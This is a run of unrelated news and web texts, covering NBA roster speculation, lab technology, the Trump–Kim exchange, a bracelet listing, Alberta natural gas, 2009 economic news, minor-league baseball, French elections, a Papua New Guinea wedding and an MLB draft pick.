Durant , many would argue , is better at the power forward spot than they are at the three . Washington already has two capable small forwards , and players that have played the three their whole lives , like Paul George , could be reluctant to play what 's largely considered a “ big man ” position .
Out of both of Washington 's small forwards , Porter is currently the only one out of the two forwards who 's done enough to prove they can play the stretch position proficiently .
Though that 's the case , Porter is still a huge question mark at the stretch position since the sample size is relatively small .
On the offensive end , Porter is capable of spacing the floor for the guards , but showed trouble defending inside against other big men .
Washington would have the same issue they had last season with Jared Dudley at the four spot . They would lack toughness and rim protection – two factors that caused much of their troubles .
That being said , the Washington Wizards could also begin to experiment with Kelly Oubre at the four spot .
The super athletic 6 ' 7″ wing has a high vertical , and a very wide 7 ' 2″ wingspan , making them adept at defending the perimeter .
Given their incredible work-ethic , it 's not out of the realm of possibility to see Oubre playing some four next season under Scott Brooks .
At this point , though , it would be extremely unrealistic to expect Oubre to play the four .
He 's simply too raw for the drastic change .
The potential change could possibly stunt their growth significantly .
Oubre has a tendency to foul , is already undersized , and lacks strength compared to others playing the forward position .
It would be a difficult transition and would take a lot of time and work . Right now , it 's not something the Washington Wizards should seriously consider .
So , now let 's consider the other side of things .
Kevin Durant signs with the Washington Wizards and is willing to play power forward , taking the starting spot from Markieff Morris , who 's known for being an emotional player . If Morris becomes disgruntled , then what ?
Washington would also have to find a way to split minutes between Morris and Durant because the former 's effectiveness would drastically decline without John Wall on the court .
It might seem like a good problem to have , but it 's one that 's difficult to figure out . Talent that does n't mix well can cause some chemistry issues on the court – just ask the Houston Rockets .
If the Washington Wizards do acquire Kevin Durant , they would probably have to move Otto Porter . As a result , Oubre 's growth would be slowed behind Durant as well .
Oubre 's playing time , once again , would be significantly lower than anyone in the starting unit . If the goal is to eventually have Oubre become one of the team 's star players , it could n't be done with Durant in town .
The Oklahoma City Thunder ran into a similar issue with James Harden after starting veteran Thabo Sefolosha . Although Harden obviously experienced a lot of success , they did n't break out until they left Oklahoma . The same thing occurred with Reggie Jackson . If the Washington Wizards want Kelly Oubre to thrive , they need to be on the court with the starters .
Washington is going to pursue Durant , and if they get him , they 'll become a lot better – on paper . There 's no question that Durant would help them sell tickets and potentially win games , but the latter is not guaranteed . The fit is kind of awkward for Durant and the rest of the players on the roster .
Steve McCoy from TetraScience talks about how their idealized high-tech perception of research was confronted by the low-tech reality they witnessed when entering the life sciences industry .
In 2016 , millions of people worldwide invited a complete stranger into their homes , and immediately they made an impact for the better . Amazon recently announced that its Echo and Echo Dot – devices powered by the voice-controlled system Alexa , were best sellers for the retail giant over the recent holiday period ; so popular , in fact , that the devices were on back order into 2017 .
If this is n't a sign that connectivity is the new rising star of tech , I 'm not sure what is . With smart tech continuing to expand rapidly , people now expect their home devices , gadgets , even their cars to sync seamlessly and with little effort . “ Internet-of-Things ” , “ Smart Home ” , “ Wearables ” , “ Smart Cities ” , and “ Connected Car ” are now everyday terms used to describe the collective concept of connected devices , and although still a relatively new phenomenon , connectivity has already made quite the impact .
And the positive implications of the adoption of this technology speaks for itself . Tech Times reported that employees using wearables reported an 8.5 % increase in productivity . In fact , the US Department of Transportation is converting Columbus , Ohio into a smart city ; complete with self-driving electric shuttles , high-speed WiFi stations , and better transportation to areas within the city . As this new technology is embraced in the gym , the city , and our automobiles , we should expect to see similar improvements made in our work environments as well , right ?
Having entered the life sciences industry about 8 months ago , I expected smart technology to already have widespread adoption . Prior to joining TetraScience , my experience in labs was primarily limited to Hollywood depictions . While scientists are not currently extracting dinosaur DNA from mosquitoes trapped in petrified amber ( we 're not far off ) , it is still hard to think of R & D as anything but the embodiment of innovation . 60 Minutes , VICE , and Business Insider continually delivers news on a weekly , if not daily basis , about all of the cool discoveries and processes R & D scientists are unearthing . Naturally , one would expect the instruments and technology employed in research to be a reflection of this cutting-edge image .
But , that assumption was only half correct . Scientific instruments are some of the coolest instruments I 've seen , with capabilities that are simply mind-boggling for non-scientists . The technology that powers them , on the other hand , leaves plenty to be questioned . Freezers and refrigerators recording temperatures via circle paper graphs must be manually collected and physically filed ( yet Kristen Bell and Dax Shepard have a fridge that can order food and provide a real-time view of their shelves ) . Analytical instruments that can cost upwards of $ 100,000 still require users download information onto a thumb drive before walking over to their work station for uploading onto a different computer . With thumb-drives becoming a tech relic , getting data from these instruments should not be so complicated .
How can an industry that has driven innovation in so many different arenas be content with such antiquated tech practices ? Many I 've spoken with in R & D cite the hundreds of different hardware manufacturers as the root cause , but with plenty of smart tech brands readily available , this issue should be easily remedied . Pen-and-paper methods should remain an option , but not the norm , but for many R & D labs and scientists , the opposite holds true , and for the most part , it 's become accepted .
But do n't be mistaken : as with connected devices in our daily lives , there are implications to life in the lab without connectivity . Deloitte 's annual study on pharmaceutical innovation showed that profits on cash investment for big pharma is at an all-time low ( 3.7 % ) , due to shrinking profits and plateaued development costs . A shrinking ROI means that there 's less budget to invest in the latest instruments , additional staff , and/or new investigations & projects .
What did Deloitte cite as one of its three key findings to reduce R & D costs ? Lifting the burden of data complexity . Downsizing the amount of time spent on low-value tasks , such as moving data from an instrument to an ELN ( what we call “ data-jockeying ” ) , can help R & D personnel focus on the more technical complications of data management . An apathetic approach to getting more from technology providers , however , wo n't let this initiative happen anytime soon .
Thankfully , there 's been a growing number companies addressing the need for connectivity in the lab . A few of those that come to mind are Benchling , LabGuru , and of course , TetraScience . To accelerate the availability and capabilities of technologies that those companies offer , scientists must demand the industry behemoths improve their own offerings . Change wo n't come overnight , and it certainly wo n't be without its faults ( just ask Alexa ) , but it 's time that R & D labs catch-up with their public perception .
World Analysis
The 'frightened dog ' and the 'rocket man ' : Trump-Kim war of words causes rising tensions
Share on Facebook Share on Twitter Share by Email
Chance of real dialogue fades as back-and-forth between the 2 leaders spins out of control
U.S. President Donald Trump 's promise of military action during their UN address obviously touched a nerve in Pyongyang , triggering a similarly direct and dismissive response from an offended Kim Jong-un , writes CBC 's Saša Petricic in analysing the impact of their war of words . ( Getty Images )
​As luck would have it , the day U.S. President Donald Trump took the stage at the United Nations to threaten North Korea , North Korean diplomats were given seats right in front of him . Front row , almost centre , based on a UN lottery that assigns spots .
This was the closest the two countries could have come to face-to-face talks since Trump became president last November .
ADVERTISEMENT
But the General Assembly delegation in New York City walked out before Trump arrived , leaving only a junior diplomat to hear the climax , where the president promised to `` destroy North Korea '' if the `` rocket man '' — as Trump calls North Korean leader Kim Jong-un — does n't back down from their threats to hit the U.S mainland with a nuclear missile .
Kim 's weapons development program seems to be getting close to producing a rocket that could do that , as Pyongyang has demonstrated with more than a dozen missile tests this year and an underground nuclear explosion . U.S. intelligence estimates North Korea will have the capability to attack the United States within a year .
Trump 's promise of military action obviously touched a nerve in Pyongyang , triggering a similarly direct and dismissive response from an offended Kim .
`` A frightened dog barks loudest , '' the North Korean leader shot back , in a rare first-person reply .
They called Trump a `` rogue , '' a `` gangster '' and a `` mentally deranged U.S . dotard . ''
'Kim Jong-un is very easy to predict . Their path toward nuclear armament is coherent and systematic . It 's Trump we can not predict , and that 's causing instability . '
- Kim Jong Dae , South Korean lawmaker
But beyond the insults , they vowed that `` rather than frightening or stopping me , '' the Trump speech convinced them that arming North Korea with nuclear missiles is the right path , `` and is the one I have to follow to the last . ''
They underlined that with a promise to set off `` the highest level of hardline countermeasure in history . ''
Kim did n't say what that meant exactly , but their foreign minister later described a likely nuclear explosion over the Pacific
Ocean .
North 's foreign minister adds to war of words
The war of words only escalated over the weekend , as the two countries took to megaphone diplomacy .
It 's one of the few channels easily available to the U.S. and North Korea , as they have no ambassadors in each other 's capitals and no sign of back-channel negotiations to avoid military conflict .
Air Force and Marine Corps aircraft conduct a mission with the South Korean Air Force over the Korean Peninsula on Sept. 18 , in response to North Korea 's intermediate range ballistic missile launch four days earlier . ( U.S. Department of Defence )
In a speech Friday night in Alabama and again on Twitter , Trump took to calling Kim `` little rocket man . ''
North Korean Foreign Minister Ri Yong-ho shouted back as they spoke to the UN on Saturday that each Trump threat and insult made `` our rocket 's visit to the entire U.S. mainland inevitable all the more . ''
And so it went , as any chance of real dialogue and negotiations to end the standoff over North Korea 's nuclear missile program fell victim to the escalating war of words .
On Friday , Trump themselves said `` maybe something gets worked out '' with Kim now , but `` personally , I 'm not sure that it will . ''
' A demonstration of U.S. resolve '
Meanwhile , in a show of force , the United States military flew B-1 Lancer bombers and F-15C fighter jets along the North Korean coast on Saturday , skirting the peninsula farther north than at any time since the 1990s , when Pyongyang started its weapons program .
The North Korean government is purported to have launched a Hwasong-14 intercontinental ballistic missile , as shown in this July 28 photo distributed by the country . ( Korean Central News Agency/Korea News Service via AP )
`` This mission is a demonstration of U.S. resolve and a clear message that the president has many military options to defeat any threat , '' said a Pentagon statement .
Fears of another underground detonation by North Korea were also sparked Saturday , when an earthquake was detected near the country 's nuclear testing site . Chinese experts initially called it a possible explosion , but they and others now say it was probably caused by settling or structural collapses triggered by Pyongyang 's last big test three weeks ago .
South 's talk of bolstering defensive weapons
In Seoul , barely 60 kilometres from the North Korean border and directly in the sights of Kim 's artillery , the tension is rising .
It 's not so much because of Kim 's threat — South Koreans feel they 've heard those before and they 're used to them . Rather , it 's because of what seems like goading from Trump .
Some see them as unpredictably trigger-happy .
`` These are extreme comments that make the situation worse , '' says Kim Jong Dae , who belongs to the centre-left Justice Party , and is a member of South Korea 's National Assembly and its national defence committee .
`` Kim Jong-un is very easy to predict , '' they say . `` His path toward nuclear armament is coherent and systematic .
`` It 's Trump we can not predict , and that 's causing instability . They use extreme words to talk about war , but they do n't have a coherent plan . ''
Popular support is rising for bolstering South Korea 's defensive weapons , and possibly even reintroducing American tactical nuclear weapons , which were withdrawn in 1991 .
That would have been unthinkable here just a few months ago .
But that was before the rhetoric exploded on both sides , raising many questions and fears about the intentions of Kim and Trump .
Clarifications An earlier version of this story said North Korea 's UN delegation left the assembly before the climax of the president 's speech . Most of the delegation left before Donald Trump took the stage .
Sep 24 , 2017 1:04 PM ET
This wish bracelet features a single star charm on a waxed cotton cord .
The star charm itself is zinc alloy and about 6mm in size ( tiny ) .
This bracelet does not have a clasp or fastener . The length of the cord is approximately 6 inches on each side of the charm and the cord itself is 1mm thick .
* * The bracelet only wraps around the wrist once ( as shown in the `` how it is tied '' picture ) . The card that the bracelet is placed on is about the size of a business card , to secure it properly on the vertical cards ; it is wrapped a few times .
This allows you to easily tie it comfortably on your wrist . You can easily trim any excess cord if needed .
* If you are looking for an anklet length instead of a bracelet length , let me know in the notes section at checkout and I will make the cord longer .
This listing includes 1 bracelet .
The bracelet arrives wrapped on thick card stock and in a resealable poly bag .
↠ We are currently trying to reduce our plastic footprint . Use code : PLASTICFREE and your order will not include any resealable poly bags as well as receive 10 % off your order .
Choose your own cord color & card .
The legend of this bracelet :
Make a wish before you tie on the bracelet . Once it falls off , your wish is supposed to come true !
Not many folks outside of Alberta pay much attention to Grande Prairie , a northern outpost tucked away in the bush about 450 kilometres northwest of Edmonton . Even within the province , the growing city of more than 60,000 keeps a low profile — but that 's about to change .
Across the province , another frontier town , Fort McMurray , knows what 's coming . When 170 billion barrels of oilsands bitumen were reclassified as official oil reserves in 2003 , the recognition put northern Alberta on the map as a serious global petroleum player .
Canadians have since been inundated with talk of the oilsands , whether it 's the economic benefits , the `` dirty oil '' label or the inescapable pipeline politics . Early last decade , though , it was the sheer size of the reserves that had an oil-hungry world just whispering the number , 170 billion barrels , for fear anything louder might spook away the oil in the ground .
Instead of fretting over dwindling supplies of fossil fuels , the discussion is now about peak demand , meaning big reserve numbers no longer capture the mainstream imagination . It 's in this new world order that the next big thing for Canada 's energy industry has quietly arrived .
Like the oilsands , the industry has long known about the Montney formation , which stretches 130,000 square kilometres in a football-shaped diagonal from northeast British Columbia into northwest Alberta .
Underneath this huge tract of land , the National Energy Board ( NEB ) estimates there 's 90 billion barrels of oil equivalent ( boe ) , most of it natural gas . That 's more than half the size of the oilsands , yet the Montney has received only a fraction of the attention , at least from the public at large . For oil and gas types , the gold rush is already on .
Output from the Montney has doubled since 2012 and now comprises a third of Western Canada 's natural gas production . By 2040 , the NEB projects it will make up more than half of the country 's production , a future that would make the energy industry positively giddy , if only it were guaranteed .
The National Energy Board ( NEB ) estimates there 's 90 billion barrels of oil equivalent ( boe ) , most of it natural gas , buried under the Montney , a 130,000- square-kilometre tract of land that runs from northeast B.C . into northwest Alberta . ( Seven Generations Energy ) Every issue that threatens to derail the ambitions of Canada 's oil and gas industry — access to market , First Nations land rights , public acceptance of infrastructure projects and , especially , the climate consequences of burning fossil fuels — is writ large in the Montney .
Even so , it 's the one bet a financially strapped industry remains willing to place . In the next four years , natural gas producers are expected to spend more than $ 34 billion on drilling and completing wells there , according to an estimate from FirstEnergy Capital .
Throwing a staggering pile of cash at one place to drill thousands of new wells may go smoothly . More likely , though , the conflicts currently playing out in the oilsands , NEB hearing rooms and along proposed pipeline routes are about to get a new front line .
The energy industry faces similar challenges in the Montney as it does in the oilsands , including concern from environmentalists . ( Seven Generations Energy )
Arguably no one knows the pending opportunity or opposition in store for the Montney better than Pat Carlson , the chief executive of Seven Generations Energy .
Their company , which only four years ago produced 4,000 boe per day , is now the de facto face of the Montney after its production climbed to more than 100,000 boe per day . The trajectory of this still relatively unknown company , which itself spent $ 1.1 billion around Grande Prairie last year , underscores the Montney 's economic potential , as well as how it could hijack Canada 's climate change agenda .
Among the world 's largest gas plays , the Montney is comparable to the Marcellus , the Utica , the Eagle Ford and the rest of the flagship names that make up America 's natural gas revolution . Beyond size , its geology is also changing the economics of Canadian gas production .
Whereas 10 years ago , finding gas in an underground zone that spanned five metres was considered a tidy score , the evolution of fracking means Montney drillers are tapping zones with a thickness of 100 to 300 metres . It 's a bona fide jackpot , but it still does n't mean the industry can rest easy .
U.S. natural gas output is up so much that the Canadian industry is now fighting to defend its traditional markets in Central Canada from interloping cross-border competitors . Even if Canada wins this fight , which is n't a lock , the next hurdle is finding more customers for Montney gas .
At a time when protesters are stopping NEB hearings and activists are blocking a pipeline project in North Dakota , Carlson says the oilpatch needs to forget about the old ways of doing business . Those who insist on putting the words social licence into air quotes , they believe , are part of the problem .
Hearing them talk is like listening to a revival tent preacher , only instead of faith he 's proselytizing for belief in the natural gas industry .
`` You just ca n't say , ' I 'm good at making buggy whips and I 've always made buggy whips , ' when buggy whips are no longer required , '' Carlson said . `` We 're looking at our stakeholders and we 're saying , 'What can we do to serve them better so they have more confidence in us ' so that 's reflected in a licence to do things … because I believe what we 're trying to do is in the best interests of all Canadians . ''
Fracking tours
In the past three years , their company has brought around 75 groups — made up of politicians , government officials , regulators , investors , First Nations members , media and whoever else will listen — to the forest around Grande Prairie to show them exactly what fracking and drilling look like on the ground .
It 's a rare effort , especially for such a young company , but Carlson knows public perception of the oil and gas industry must change for the Montney to reach its potential .
Pat Carlson , CEO of Seven Generations Energy , gives a tour of their company 's operations . ( Paul Haavardsrud/CBC )
For industry , a best-case scenario would see liquefied natural gas ( LNG ) terminals go ahead on the West Coast , while a new generation of natural gas-fired power plants comes into service across the country .
The broadest trend in the energy world right now , electrification , suggests these pieces could be falling into place . An expanding global population and electric cars on the horizon , explains Peter Tertzakian , chief energy economist at ARC Financial , will only send the world 's power needs higher . As yet to be determined is the role of natural gas , which is more climate-friendly than coal , but less so than nuclear and renewables .
`` Years ago , I was giving speeches to oil executives , asking them the question rhetorically , 'What business are you in ? ' '' Tertzakian said . `` Inevitably , someone would put up their hand and say , ' I 'm in the oil business ' , and I 'd say , 'No you 're not , you 're in the business of turning wheels , that 's your business . You should be concerned about what 's happening to the transportation market . ' ''
With two-thirds of every barrel of oil used to move cars , trucks , planes and boats , a shift towards electric vehicles could cause global gas demand to surge .
A look at a fracking site in the Montney . ( Paul Haavardsrud/CBC )
That scenario could see the usual boomtown pressures — the social ills , housing shortages and disregard for environmental and safety standards — descend on Grande Prairie , the regional hub for the Montney .
It 's a fate the city 's mayor , Bill Given , does n't see as a foregone conclusion .
`` The Alberta mythos is that it 's the Wild West and you go out and do your thing , '' they said . `` More and more companies are attempting to take a balanced approach and I do n't think that 's something we would have seen five or 10 years ago . ''
Grande Prairie Mayor Bill Given does n't think their city will be overcome with the pressures and problems that often come with being the hub of a regional energy boom . ( CBC )
If a more enlightened approach is , indeed , the new normal , the test will come when gas prices move higher , LNG projects go ahead , and a boom starts in earnest .
Before any of that happens , Canada will need to define natural gas 's role in the transition to renewables . While the energy sector is quick to position gas , which has half the carbon emissions of coal , as a bridge fuel to a cleaner future , environmentalists are less enamoured .
Environmental no-man 's land
If Canada is to meet its climate change goals , the green lobby does n't see a big role for gas past 2030 . Given how long a power generator would need to run a gas-fired plant to make it profitable , this timeframe leaves gas in an environmental no-man 's land .
`` This idea of developing and marketing gas as a solution to climate change , I would disagree with , '' said Matt Horne , a climate change expert with the Pembina Institute , an energy think-tank . `` If we have the right policies in place there will be a role for gas . I do n't think we create that role by making more and more gas available , that role is created by having strong climate change policy . ''
Developing the Montney on a grand scale would take a national climate change strategy — as opposed to the current patchwork of provincial regulations — that makes room for natural gas by prioritizing energy efficiency and cutting greenhouse gas emissions elsewhere , like the oilsands .
It 's a formidable pan-Canadian goal , but without it , the opposition to pipelines such as Energy East shows what to expect for proposed infrastructure that would carry gas from northeast B.C . to projects like the Pacific NorthWest LNG facility .
Protesters gathered outside the building where NEB hearings on the proposed Energy East pipeline were scheduled to take place in downtown Montreal back in August . Officials decided to cancel the hearings that week . ( Charles Contant/Radio-Canada )
The rapid growth of a company like Seven Generations shows how quickly Montney gas can fill up an LNG terminal . Still , building the infrastructure to bring that gas to market ca n't happen without government policy support and broad social licence from the public .
This , in a nutshell , is the great frustration of the energy industry . The environmental movement , meanwhile , is equally worried about what development without the right climate policies in place will mean for the planet .
This stalemate is , by now , a well-worn part of the national conversation . Given what 's coming , the Montney may turn into the defining referendum that determines whether Canada can find any middle ground .
NEW YORK ( Reuters ) - The prospect of new tax cuts in the United States and Germany injected a measure of New Year cheer on Monday , even as automakers wrapped up 2008 as their worst in more than 15 years with yet another month of slumping U.S. sales .
German Chancellor Angela Merkel is pictured at the Chancellery in Berlin , December 30 , 2008 , after the recording of their annual television New Year speech . REUTERS/Michael Gottschalk/Pool
Automakers continue to suffer from weak U.S. demand , with General Motors Corp , Ford Motor Co and Toyota all reporting December sales declines of more than 30 percent .
Asian stocks climbed to a two-month high on optimism that massive government spending programs will revive global growth , and European shares also advanced , though U.S. stocks gave back part of the strong gains racked up last week .
In a move that could help speed approval of a new stimulus plan in the United States , U.S. President-elect Barack Obama will seek as much as $ 310 billion in tax cuts as part of a move to counter what senior policymakers warned could be a prolonged period of economic stagnation and deflation .
Still , one top Democratic senator said enactment would not likely come until February despite congressional Democrats ' hopes to present the incoming president with a stimulus measure to sign in the early days of their term .
In Germany , Chancellor Angela Merkel met their Social Democrat ( SPD ) coalition partners to discuss a second fiscal stimulus deal worth up to 50 billion euros . That would come on top of a 31 billion euro package last year that Merkel 's critics — including some European Union allies — believe was too small to haul Europe 's leading economy out of recession .
Merkel on Sunday came out in favor of tax relief moves they had previously ruled out until after September 's federal election . But they faced tough talks to get the SPD to agree .
“ It will be very difficult to get a common denominator on tax , ” Andrea Nahles , SPD deputy leader , told German radio . No firm decisions were expected on Monday , but a government spokesperson said talks would prepare the groundwork for a January 12 deal .
The stimulus plans by the world 's No . 1 and No . 3 economies mark the latest attempts to tackle a financial crisis that began with U.S. mortgage defaults in 2007 and snowballed into global market turmoil that threatens much of the world with a deep recession .
Along the way , the crisis has reshaped the banking landscape and pushed countries to the brink of bankruptcy .
U.S . CAR WOES
Chrysler LLC led the industry lower with U.S. sales that dropped by 53 percent in December , a month when the struggling automaker and larger rival GM fought to clinch a $ 17.4-billion bailout from the U.S. government .
Toyota Motor Corp , the world 's largest automaker , posted a sales drop of 37 percent , followed by Honda Motor Co at 35 percent and Ford Motor Co at 32 percent . GM and Nissan Motor Co saw sales drop 31 percent .
That followed December auto sales figures from Japan and France , which posted steep falls of 22 percent and 15.8 percent , respectively , adding to a swathe of grim data from an industry bearing the brunt of wrecked consumer confidence .
Meanwhile overseas , data published on Monday increased the pressure on the ECB to keep cutting interest rates . Spanish inflation in December was the lowest in a decade , at 1.5 percent , while Italian inflation fell to a 14-month low of 2.3 percent .
In Asia , December data showed greater-than-expected easing of inflation in Thailand , Indonesia and Taiwan , raising the prospect of temporary deflation and further rate cuts there .
Some investors , however , have begun to make tentative bets that the worst of the turmoil , which took a sharp turn for the worse in September with the collapse of investment bank Lehman Brothers , is over .
Kicking off the first full week of 2009 , they pushed up Asian and European stocks , the dollar and commodities while selling safe-haven plays such as government bonds and the Japanese yen .
In the United States , government spending on projects helped limit a decline in construction spending to 0.6 percent in November , beating Wall Street forecasts , although private home building remained dismal and was likely to keep tumbling .
SURPRISE UPTURN
Sentiment among euro zone investors improved for the first time in seven months in January , showing its biggest rise since August 2005 , though morale among the 16 nations remained negative , the Sentix research group said .
“ In the eyes of investors , measures taken by many states and central banks worldwide seem to be having an impact . We assume many indicators will follow the early indication from Sentix in the coming weeks and months , ” Sentix said .
Slideshow ( 5 Images )
Asian stocks hit a two-month high and the FTSEurofirst 300 fell 1.9 percent , but U.S. stocks dipped nearly 1 percent .
Oil prices were above $ 48.50 a barrel as crude extended its rise to more than 40 percent since late December on Israel 's incursion into Gaza and the Russian gas dispute continued .
San Antonio got a big lift from Javier Guerra and strong work from the bullpen in a crucial 4-3 win over Midland in Game 2 of the Texas League South Division Series Thursday night at Wolff Stadium .
After a disappointing Game 1 on Wednesday , the Missions were poised to storm out of the gates Thursday . And they did just that , taking a 1-0 lead in the first against righty James Naile . Fernando Tatis Jr. and Luis Urias led off the frame with singles , setting Missions with runners on the corners . Naile then got Noah Perio to bang into a double play , but it scored Tatis Jr. for the game 's first run .
Midland quickly tied the game at one in the second against Brett Kennedy when J.P. Sportman doubled in Viosergy Rosa .
In the bottom of the third , San Antonio tacked on two more against Naile ( 0-1 ) with a Ty France RBI-single and another run-producing double play , this time off the bat of Nick Torres . Urias extended the San Antonio lead to 4-1 in the fourth with an RBI-single that scored Guerra , who had begun the rally with a double to right center .
Midland trimmed its deficit to two in the fifth against Kennedy when Jorge Mateo scored Sportman from second with a single to left . However , the RockHounds had a chance to do much more . After a Jordan Tarsovich walk loaded the bases , Jermaine Curtis shot a line drive which seemed destined to sail into left for a game-tying single . Fortunately for the Missions , an alert Guerra made a sensational play deep in the hole at short to corral the liner and end the threat .
Rosa , who dominated the Missions in Game 1 with two homers and 8 RBI , went deep again in the sixth against Kennedy , cutting the San Antonio lead to just one . Kennedy ( 1-0 ) would retire Sheldon Neuse for the first out of the inning before giving way to the bullpen .
As usual , the San Antonio pen came up big as Eric Yardley , Brad Wieck and Trey Wingenter ( save ) combined to keep Midland off the board over the final three and two-thirds innings , while surrendering no walks and just one hit .
San Antonio and Midland resume the TLDS on Friday with Game 3 from Security Bank Ballpark . First pitch from Midland is slated for 7:00 PM . Lefty Joey Lucchesi ( 5-3 , 1.79 ) will get the ball for the Missions , while the 'Hounds counter with right-hander Grant Holmes ( 11-12 , 4.49 ) .
“ France is back , ” Edouard Philippe , the prime minister for Mr. Macron , said after the strong vote for the president 's party , though they lamented the relatively light turnout , about 49 percent of the voting public , according to the Interior Ministry .
“ Despite the abstention , the message of the French has no ambiguity : For the third consecutive time , millions of you confirmed your attachment to the president of the republic 's project to renew , unite and win back , ” said Mr. Philippe , whom Mr. Macron brought in from the mainstream , right-leaning Republican Party .
Those candidates garnering 50 percent or more of the votes in their districts will be declared the winners . But given the large number of candidates for each seat , and the low turnout , most of the top vote getters will face a runoff next Sunday . To claim a majority in Parliament , candidates supporting Mr. Macron will need to win at least 289 seats . Failing that , they have formed an alliance with the centrist Democratic Movement to help ensure a majority . However , as things now stand , it appears all but certain that the president will have a majority — and potentially a large one .
Parties on the extreme right and left seemed to be faring poorly , gaining far fewer votes nationwide than they had in the first round of the presidential election , on April 23 . Returns showed that the National Front would take about 13.5 percent of the vote , while Jean-Luc Mélenchon 's leftist France Unbowed Party was expected to win just 11 percent .
At the same time , the traditional parties on the left and the right have been weakened , with the Socialists looking particularly feeble . Having controlled Parliament for the last five years , the Socialists were expected to win just 7.4 percent of the vote in the legislative elections this year . The Republicans and their allies fared better , but with just shy of 22 percent of the vote , they were a distant second to Mr. Macron 's party .
Image copyright Other
It 's not every day you get a chance to visit Papua New Guinea , and even rarer to be invited to a highland wedding , where grass aprons are de rigueur and the bride 's value is measured in pigs .
It was a wedding I could not pass up - a traditional tribal ceremony in the remote southern highlands of Papua New Guinea and I was invited as family .
Komya village was once home for Moses , the bridegroom . After being abandoned as a child and on the verge of starvation , they were taken in by an Australian couple and ended up in Melbourne .
There they met Danielle - my niece . They were only 13 years old , but romance slowly blossomed and a decade later they decided to marry .
Though outwardly a genuine `` dinky-die '' Aussie who works as a nurse , Moses retained their cultural roots , so the young couple decided they would journey back to Komya for their wedding .
Moses entered the world as the fifth child , of the fifth wife , of the clan chief .
When their father died , their mother remarried into a rival clan , but their children were not welcome and had to stay behind and fend for themselves . They were rejected by their large extended family who were unable to grow enough sweet potato , the staple crop , to feed the extra mouths .
But in a strange twist of fate , Moses was now returning triumphant , with an unknown bride from an unfamiliar place . In Komya , this had never happened before .
800 languages
From a small airfield in the provincial capital , Mendi , our wedding party bounced its way along the pitted highway that cut through the lush rainforest .
Throughout the three hour journey , locals waved at us , bringing our vehicles to a stop .
They wanted to chat to Moses , and peer curiously at all of us - white-skinned foreigners . Animated conversations took place in a mix of English and Pidgin - two of the more than 800 languages spoken in Papua New Guinea .
News of the big event had evidently spread far and wide . Hundreds of people walked to Komya for the ceremony .
Marriage in this part of the country is a commercial transaction . The groom 's family negotiates a price with the family of a woman from another village .
Image copyright ( C ) British Broadcasting Corporation
If they can afford her , a deal is struck and they will move to the hut they will build on their land . The bride price is measured in pigs and shells , but these days banknotes are often thrown in for good measure .
In Port Moresby , the country 's capital , our taxi driver told us they had paid 30 pigs for their second wife . This made me realise what a bargain Danielle had been .
My niece had been deemed a four-pig bride , and some of the hapless creatures , fattened for a year , would be slaughtered , baked and eaten at the bridal feast .
Dead birds
On the wedding day , a soft rain fell . The women separated from the men .
A group of giggling , bare-breasted women surrounded us females and gently removed our clothes . They dressed us in two grass aprons , open at the sides .
Image copyright Other Image caption The fifth wife of the former clan chief , with their fifth child - Moses
Our faces were carefully painted in the village style - white from the nose to jaw , with yellow streaks above the brow and on the cheekbones .
Along with the face paint , the men were given spears or bows and arrows . They wore leaves at the back , a chest pad made of shell and stringy fibre , decorative armbands and headgear containing brightly feathered dead birds .
Then the village women linked arms and we bounced up and down rhythmically , whilst making a strange hissing sound . The men , standing opposite , did the same .
Young girls in the crowd squealed with delight and Danielle and Moses were married .
Then the `` handing over of the pigs '' ceremony began .
The villagers lining up on four sides of a square , facing the tethered animals in the middle . The bride 's relatives were summoned to inspect the pigs . That done , their ropes were untied and then they were handed over to Danielle 's mother .
In the interests of establishing a good relationship with the in-laws , they returned two pigs to the groom 's family . The other two had already been ear-marked for next day 's wedding feast . This was to be held on a patch of land belonging to Moses ' brothers .
Papua New Guinea Many tribes in the isolated mountainous interior have little contact with one another , let alone with the outside world , and grow all their own food
Australia administered the territory until it gained independence in 1975
Main exports : Gold , petroleum , copper , coffee , palm oil , logs
Two rival politicians are vying for the post of PM - officers staged a mutiny on Thursday in a failed bid to reinstate the man ousted six months ago Country profile
The pigs were baked on banana leaves in pits filled with hot stones .
We had brought balloons and Frisbees for the village children , and as they giggled and jumped , the adults sucked the fat from young fern leaves that had cradled the pork meat as it cooked .
Papua New Guinea is not a poor country . It has substantial mineral wealth and a liquefied natural gas pipeline in construction that will bring in vast amounts of money .
But so far little of this wealth has trickled down to the people in Komya , who live without electricity or water in woven huts with dirt floors .
As dusk gathered , and the villagers hiked barefoot through deep mud to their homes , they did not have a candle between them .
Yet when I took a glance at my smartphone , I noted the excellent signal . Whatever basic services the villagers here lack , texting is not a problem .
How to listen to From Our Own Correspondent :
BBC Radio 4 : A 30-minute programme on Saturdays , 11:30 GMT .
Second 30-minute programme on Thursdays , 11:00 GMT ( some weeks only ) .
Listen online or download the podcast
BBC World Service :
Hear daily 10-minute editions Monday to Friday , repeated through the day , also available to listen online .
Read more or explore the archive at the programme website .
Seth Romero was dismissed from the Houston baseball team in May . ( Photo courtesy of University of Houston )
The Washington Nationals made polarizing college left-hander Seth Romero the 25th overall pick in the 2017 MLB draft Monday , hoping to find more first-round value in a player who fell from potential top 10 status due to off-field issues .
“ We felt comfortable in the fact that we knew their history . Our area scouts are guys who know him , ” Nationals General Manager Mike Rizzo said . “ And we expect them to conduct themselves with maturity and be professional and be accountable for their actions . ”
The Nationals have a history of seeking players whose draft stock has dipped , but not for reasons like the ones that caused Romero to drop . In the past , the Nationals have leaned toward injured players to find top-five talent lower in the first round . This year , they chose a 21-year-old with elite stuff , despite the fact that they were being kicked off the University of Houston baseball team after being suspended twice in three years .
[ Twins pass on two-way phenoms , take shortstop Royce Lewis with first pick of MLB draft ]
As a sophomore , they were suspended for what was officially called “ conduct detrimental to the team. ” The Houston Chronicle reported that suspension largely stemmed from “ a lack of effort regarding conditioning , ” a problem Romero seemed to have rectified when they arrived for their junior season 40 pounds lighter . They were named a preseason all-American and the Cougars ' Opening Day starter .
But Romero ran into trouble again this season , when they were suspended for most of the month of April for what was officially referred to as “ a violation of team rules ” while the Cougars were on a trip to the University of Central Florida . The Chronicle reported that they were suspended , in part , because of a failed drug test , in which they tested positive for marijuana . Just more than a week later , Houston dismissed them from the team , which Chronicle Cougars beat reporter Joseph Duarte reported was due to a fight with another player .
“ He certainly needs to be accountable for their actions , ” Rizzo said . “ We are going to demand that they conduct themselves like all our players do . Be proud of the name on the front of the jersey is something that we harp on here once we sign the player , and we feel that with our development system , he 's going to conduct themselves as a professional and adhere to the rules and regulations we set forth for all of our minor league players . ”
